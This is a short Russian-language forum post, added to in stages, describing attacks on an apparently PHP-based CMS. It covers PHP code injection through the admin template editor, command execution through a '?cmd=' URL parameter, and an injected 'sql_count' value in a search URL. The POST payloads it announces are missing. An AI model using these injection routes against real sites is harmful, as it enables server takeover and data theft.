Там два момента. На мой взгялд они не связаны (с поиском и средактором шаблона). Редактор доступен только из админки, и вот что мне удалось натестить:

Если отправить POST запрос приблизительного следующего содержания:

Поигратся с кавычками, то можно затолкать туда php код для исполнения...

С поиском так и не понял, что можно намутить

__________________________________

К моему предедёщему посту дополнение.

В POST запросе нужно отправить:

после этого любая комманды вида:

site.ru/?cmd=echo%20phpinfo();

ЗЫ комманда д.б. закодирована urlencode();

___________________________________

не стоим на месте:

"глобальные массивы" д.б. ОN, а дальше:

?do=search&subaction=search&story=bla-bla&sql_count=Sql_Que..&titleonly=FOUR